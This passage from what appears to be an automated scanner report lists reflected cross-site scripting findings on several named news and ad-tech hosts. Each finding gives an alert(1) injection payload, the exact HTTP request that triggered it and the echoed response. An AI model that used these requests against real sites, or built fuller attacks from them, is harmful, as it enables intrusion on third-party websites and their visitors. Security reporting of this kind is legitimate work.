Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Length: 9474
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Cache-Control: no-cache
Expires: Mon, 09 May 2011 15:38:00 GMT
Date: Mon, 09 May 2011 15:38:00 GMT
Connection: close

var blocks = {"url": "5b62f(a)0ff55e3ea5c","ref": "","title": "5b62f(a)0ff55e3ea5c","section": "5b62f(a)0ff55e3ea5c","nav": "<ul id=\"section-nav\"><li class=\"sectionlabel\">News:</li><li class=\"nav
...[SNIP]...
tData(String retrieverType, String tags, Int32 count, Dictionary`2 dataparms)
at FeedDataService.DataService.GetData()
at SuperFeeds.feed.ProcessRequest(HttpContext context) /feed/most/popular-5b62f(a)0ff55e3ea5c/json/5</div>
...[SNIP]...

2.70. http://data.usatoday.net/apps/InsidePage [url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://data.usatoday.net
Path:   /apps/InsidePage

Issue detail

The value of the url request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d135b"%3balert(1)//12ce116bf28 was submitted in the url parameter. This input was echoed as d135b";alert(1)//12ce116bf28 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /apps/InsidePage?var=blocks&url=http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htmd135b"%3balert(1)//12ce116bf28 HTTP/1.1
Host: data.usatoday.net
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Length: 12749
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Cache-Control: no-cache
Expires: Mon, 09 May 2011 15:38:00 GMT
Date: Mon, 09 May 2011 15:38:00 GMT
Connection: close

var blocks = {"url": "http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htmd135b";alert(1)//12ce116bf28","ref": "","title": "12ce116bf28","section": "Weather","nav": "<ul id=\"section-nav\">
...[SNIP]...

2.71. http://data.usatoday.net/apps/InsidePage [var parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://data.usatoday.net
Path:   /apps/InsidePage

Issue detail

The value of the var request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 734a0%3balert(1)//0e9845649fa was submitted in the var parameter. This input was echoed as 734a0;alert(1)//0e9845649fa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /apps/InsidePage?var=blocks734a0%3balert(1)//0e9845649fa&url=http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm HTTP/1.1
Host: data.usatoday.net
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Length: 12743
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Cache-Control: no-cache
Expires: Mon, 09 May 2011 15:38:00 GMT
Date: Mon, 09 May 2011 15:38:00 GMT
Connection: close

var blocks734a0;alert(1)//0e9845649fa = {"url": "http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm","ref": "","title": "Floods","section": "Weather","nav": "<ul id=\"section-nav\">
...[SNIP]...

2.72. http://ds.addthis.com/red/psi/sites/www.fox8live.com/p.json [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.fox8live.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 18cfc<script>alert(1)</script>6e94a043035 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.fox8live.com/p.json?callback=_ate.ad.hpr18cfc<script>alert(1)</script>6e94a043035&uid=4dab4fa85facd099&url=http%3A%2F%2Fwww.fox8live.com%2Fnews%2Flocal%2Fstory%2FSt-Bernard-prepares-for-rising-Mississippi-River%2FvJUO9a9n60iNAXZ6QCm2oQ.cspx&xp66c HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh41.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uit=1; di=%7B%7D..1304951889.1FE|1304951889.60; dt=X; psc=4; uid=4dab4fa85facd099

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 227
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Mon, 09 May 2011 15:38:39 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Wed, 08 Jun 2011 15:38:39 GMT; Path=/
Set-Cookie: di=%7B%7D..1304951889.1FE|1304955519.1OD|1304951889.60; Domain=.addthis.com; Expires=Wed, 08-May-2013 15:38:02 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Mon, 09 May 2011 15:38:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 09 May 2011 15:38:39 GMT
Connection: close

_ate.ad.hpr18cfc<script>alert(1)</script>6e94a043035({"urls":["http://xcdn.xgraph.net/15530/db/xg.gif?pid=15530&sid=10001&type=db&p_bid=4dab4fa85facd099"],"segments" : ["1OD"],"loc": "MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg=="})

2.73. http://event.adxpose.com/event.flow [uid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://event.adxpose.com
Path:   /event.flow

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload 388c8<script>alert(1)</script>6f81c5c2df was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2Fwww.csmonitor.com%2FBusiness&uid=ZC45X9Axu6NOUFfX_289669388c8<script>alert(1)</script>6f81c5c2df&xy=0%2C0&wh=300%2C250&vchannel=69112&cid=172249&iad=1304955321345-89810743578709660&cookieenabled=1&screenwh=1920%2C1200&adwh=300%2C250&colordepth=16&flash=10.2&iframed=1 HTTP/1.1
Host: event.adxpose.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=8046e9fe-2ba6-4040-b3b9-5d1af9c46888

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=6B586A135B60950B5DCB0D4C24B6EBC5; Path=/
Cache-Control: no-store
Content-Type: text/javascript;charset=UTF-8
Content-Length: 144
Date: Mon, 09 May 2011 15:35:29 GMT
Connection: close

if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__("ZC45X9Axu6NOUFfX_289669388c8<script>alert(1)</script>6f81c5c2df");

2.74. http://finance.fox8live.com/inergize.wvue [Module parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://finance.fox8live.com
Path:   /inergize.wvue

Issue detail

The value of the Module request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1e0df'-alert(1)-'3ecdc21eb2c was submitted in the Module parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /inergize.wvue?Module=snapshot21e0df'-alert(1)-'3ecdc21eb2c&Output=JS HTTP/1.1
Host: finance.fox8live.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/business/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:03 GMT
Server: nginx/0.8.15
Content-Type: text/javascript; charset=UTF-8
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Mon, 09 May 2011 15:37:03 GMT
X-Cache: MISS from squid1.sv1.financialcontent.com
X-Cache-Lookup: MISS from squid1.sv1.financialcontent.com:3128
Via: 1.0 squid1.sv1.financialcontent.com (squid/3.0.STABLE16)
Vary: Accept-Encoding
Connection: close
Content-Length: 794


var head=document.getElementsByTagName('head')[0];
var script=document.createElement('script');
script.type="text/javascript";
script.src='http://tracker.financialcontent.com/track.js?Source=http%3A%2F%2Ffinance.fox8live.com%2Finergize.wvue%3FHTTP_HOST%3Dfinance.fox8live.com%26HTTPS%3Doff%26Module%3Dsnapshot21e0df'-alert(1)-'3ecdc21eb2c%26Output%3DJS&Type=widget&Client=inergize.wvue&rand=' + Math.random();
head.appendChild(script);

_qoptions={
qacct:"p-0cUI5xpPZj8YQ"
};
var head=document.getElementsByTagName('head')[0];
var scri
...[SNIP]...

2.75. http://finance.fox8live.com/inergize.wvue [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://finance.fox8live.com
Path:   /inergize.wvue

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 98e61'-alert(1)-'1eee3fb9769 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /inergize.wvue98e61'-alert(1)-'1eee3fb9769?Module=snapshot2&Output=JS HTTP/1.1
Host: finance.fox8live.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/business/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:05 GMT
Server: nginx/0.8.15
Content-Type: text/javascript; charset=UTF-8
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Mon, 09 May 2011 15:37:05 GMT
Expires: Mon, 09 May 2011 15:38:05 GMT
X-Cache: MISS from squid2.sv1.financialcontent.com
X-Cache-Lookup: MISS from squid2.sv1.financialcontent.com:3128
Via: 1.0 squid2.sv1.financialcontent.com (squid/3.0.STABLE16)
Vary: Accept-Encoding
Connection: close
Content-Length: 41367

document.write('<style>\n');
document.write('\n');
document.write('\/* Global CSS Styles *\/\n');
document.write('.fcwidget * {\n');
document.write(' padding:0px; \n');
document.write(' border:0px; \n
...[SNIP]...
)[0];
var script=document.createElement('script');
script.type="text/javascript";
script.src='http://tracker.financialcontent.com/track.js?Source=http%3A%2F%2Ffinance.fox8live.com%2Finergize.wvue98e61'-alert(1)-'1eee3fb9769%3FHTTP_HOST%3Dfinance.fox8live.com%26HTTPS%3Doff%26Module%3Dsnapshot2%26Output%3DJS&Type=widget&Client=inergize.wvue98e61'-alert(1)-'1eee3fb9769&rand=' + Math.random();
head.appendChild(script);

_
...[SNIP]...

2.76. http://finance.fox8live.com/inergize.wvue [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://finance.fox8live.com
Path:   /inergize.wvue

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 50502'-alert(1)-'40811c352d1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /inergize.wvue?Module=snapshot2&Output=JS&50502'-alert(1)-'40811c352d1=1 HTTP/1.1
Host: finance.fox8live.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/business/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:04 GMT
Server: nginx/0.8.15
Content-Type: text/javascript; charset=UTF-8
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Mon, 09 May 2011 15:37:04 GMT
Expires: Mon, 09 May 2011 15:38:04 GMT
X-Cache: MISS from squid1.sv1.financialcontent.com
X-Cache-Lookup: MISS from squid1.sv1.financialcontent.com:3128
Via: 1.0 squid1.sv1.financialcontent.com (squid/3.0.STABLE16)
Vary: Accept-Encoding
Connection: close
Content-Length: 40716

document.write('<style>\n');
document.write('\n');
document.write('\/* Global CSS Styles *\/\n');
document.write('.fcwidget * {\n');
document.write(' padding:0px; \n');
document.write(' border:0px; \n
...[SNIP]...
script.src='http://tracker.financialcontent.com/track.js?Source=http%3A%2F%2Ffinance.fox8live.com%2Finergize.wvue%3FHTTP_HOST%3Dfinance.fox8live.com%26HTTPS%3Doff%26Module%3Dsnapshot2%26Output%3DJS%2650502'-alert(1)-'40811c352d1%3D1&Type=widget&Client=inergize.wvue&rand=' + Math.random();
head.appendChild(script);

_qoptions={
qacct:"p-0cUI5xpPZj8YQ"
};
var head=document.getElementsByTagName('head')[0];
var script=documen
...[SNIP]...

2.77. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs [PluID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs

Issue detail

The value of the PluID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa553"-alert(1)-"6db1ea67994 was submitted in the PluID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2320695&PluID=0aa553"-alert(1)-"6db1ea67994&w=300&h=250&ord=2660552&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/250%3B41589231/41607018/1%3B%3B%7Esscs%3D%3f$$ HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://www.npr.org/templates/reg/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=F353BA1915795343A0F9402D71BD02A2; Path=/
Content-Type: text/javascript
Content-Length: 8043
Date: Mon, 09 May 2011 15:39:52 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://www.npr.org/templates/reg/",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2320695&PluID=0aa553"-alert(1)-"6db1ea67994&w=300&h=250&ord=2660552&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/250%3B41589231/41607018/1%3B%3B%7Esscs%3D%3f$$",
   adsafeSep : "&",
   re
...[SNIP]...

2.78. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eec2b"-alert(1)-"73b143e8b37 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/bs.serving-sys.comeec2b"-alert(1)-"73b143e8b37/9766/90645/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2320695&PluID=0&w=300&h=250&ord=2660552&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/250%3B41589231/41607018/1%3B%3B%7Esscs%3D%3f$$ HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://www.npr.org/templates/reg/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=75C77546E2FDBC3BDA7E9D1F94CBDA6B; Path=/
Content-Type: text/javascript
Content-Length: 8043
Date: Mon, 09 May 2011 15:39:52 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://www.npr.org/templates/reg/",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/bs.serving-sys.comeec2b"-alert(1)-"73b143e8b37/9766/90645/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2320695&PluID=0&w=300&h=250&ord=2660552&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/25
...[SNIP]...

2.79. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c93f2"-alert(1)-"d26d1447152 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/bs.serving-sys.com/9766c93f2"-alert(1)-"d26d1447152/90645/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2320695&PluID=0&w=300&h=250&ord=2660552&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/250%3B41589231/41607018/1%3B%3B%7Esscs%3D%3f$$ HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://www.npr.org/templates/reg/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=263751F3FB1658F4A13DD4C934811422; Path=/
Content-Type: text/javascript
Content-Length: 8043
Date: Mon, 09 May 2011 15:39:53 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://www.npr.org/templates/reg/",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/bs.serving-sys.com/9766c93f2"-alert(1)-"d26d1447152/90645/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2320695&PluID=0&w=300&h=250&ord=2660552&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/250%3B4
...[SNIP]...

2.80. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 41d4b"-alert(1)-"2bc1aa27d11 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/bs.serving-sys.com/9766/9064541d4b"-alert(1)-"2bc1aa27d11/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2320695&PluID=0&w=300&h=250&ord=2660552&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/250%3B41589231/41607018/1%3B%3B%7Esscs%3D%3f$$ HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://www.npr.org/templates/reg/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=BDE6C67ED5D1DA3D339CCD1B475C599B; Path=/
Content-Type: text/javascript
Content-Length: 8043
Date: Mon, 09 May 2011 15:39:53 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://www.npr.org/templates/reg/",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/bs.serving-sys.com/9766/9064541d4b"-alert(1)-"2bc1aa27d11/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2320695&PluID=0&w=300&h=250&ord=2660552&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/250%3B4158923
...[SNIP]...

2.81. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload afd0f"-alert(1)-"91890140fec was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/bs.serving-sys.com/9766/90645/BurstingPipeafd0f"-alert(1)-"91890140fec/adServer.bs?cn=rsb&c=28&pli=2320695&PluID=0&w=300&h=250&ord=2660552&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/250%3B41589231/41607018/1%3B%3B%7Esscs%3D%3f$$ HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://www.npr.org/templates/reg/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=9A826F056C48F6FF462E93381B905229; Path=/
Content-Type: text/javascript
Content-Length: 8043
Date: Mon, 09 May 2011 15:39:53 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://www.npr.org/templates/reg/",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/bs.serving-sys.com/9766/90645/BurstingPipeafd0f"-alert(1)-"91890140fec/adServer.bs?cn=rsb&c=28&pli=2320695&PluID=0&w=300&h=250&ord=2660552&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/250%3B41589231/41607018/1%
...[SNIP]...

2.82. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e664a"-alert(1)-"1983e917118 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bse664a"-alert(1)-"1983e917118?cn=rsb&c=28&pli=2320695&PluID=0&w=300&h=250&ord=2660552&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/250%3B41589231/41607018/1%3B%3B%7Esscs%3D%3f$$ HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://www.npr.org/templates/reg/
